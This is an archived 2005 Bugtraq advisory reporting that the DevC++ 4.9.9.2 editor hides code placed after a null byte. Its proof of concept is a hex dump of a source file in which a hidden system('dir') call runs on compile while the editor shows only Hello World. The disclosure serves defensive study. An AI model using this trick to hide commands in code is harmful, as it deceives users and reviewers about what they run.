lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050818112154.8971.qmail@securityfocus.com>
Date: 18 Aug 2005 11:21:54 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW (by rgod)


DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW

UPDATE TO HTTP://RGOD.ALTERVISTA.ORG/SYN.HTML
explaining Synedit component obfuscation flaw

exploit: a user can craft a malicious file using null byte (%00) to obfuscate
code and hide malicious instrunctions to the victim user

poc:

this is an hexadecimal dump of poc.cpp file

23 69 6e 63 6c 75 64 65 20 3c 69 6f 73 74 72 65    # i n c l u d e  < i o s t r e 
61 6d 2e 68 3e 0d 0a 23 69 6e 63 6c 75 64 65 20    a m . h >   # i n c l u d e  
3c 73 74 64 6c 69 62 2e 68 3e 0d 0a 0d 0a 69 6e    < s t d l i b . h >     i n 
74 20 6d 61 69 6e 28 29 0d 0a 7b 0d 0a 20 20 63    t  m a i n ( )   {     c 
6f 75 74 20 3c 3c 20 22 48 65 6c 6c 6f 20 57 6f    o u t  < <  " H e l l o  W o 
72 6c 64 21 22 3b 0d 0a 20 20 00 73 79 73 74 65    r l d ! " ;        s y s t e 
6d 20 28 22 64 69 72 22 29 3b 20 0d 0a 20 20 72    m  ( " d i r " ) ;      r 
65 74 75 72 6e 20 30 3b 0d 0a 7d 20 0d 0a 0d 0a    e t u r n  0 ;   }  

when you open with DevC++,It looks like this:

#include <iostream.h>
#include <stdlib.h>

int main()
{
  cout << "Hello World!";
  
  return 0;

}

but when a victim user compile and execute it

system('dir');

will be executed even

rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it

original advisoty: http://rgod.altervista.org/devcpp.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ